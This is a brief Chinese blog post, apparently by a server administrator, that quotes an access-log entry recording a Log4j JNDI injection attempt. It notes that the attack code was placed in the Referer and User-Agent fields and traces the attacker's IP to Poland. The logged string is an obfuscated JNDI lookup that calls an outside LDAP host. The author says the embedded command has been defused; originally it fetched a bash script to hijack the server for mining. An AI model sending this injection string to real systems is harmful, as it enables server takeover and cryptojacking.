95.214.55.244 - - [09/May/2023:17:35:35 +0800] "GET / HTTP/1.1" 200 1833 "t('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/dGhpcyBpcyBMb2c0aiBoYWNramFjayBhdHRhY2sgY29kZQ}')" "t('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/dGhpcyBpcyBMb2c0aiBoYWNramFjayBhdHRhY2sgY29kZQ}')"
這次攻擊方式與上次不同的地方, 它於 Log中的 Referer及 User Agent置入攻擊碼, 由於具危險性, 我將其中的可執行亂碼另做編輯過, 原本的是執行其中程式碼下載某處的 bash檔, 再執行此 bash檔綁架你的伺服器當成挖礦的殭屍主機
調查其中兩個 IP:
95.214.55.244 來自波蘭
沒有留言:
張貼留言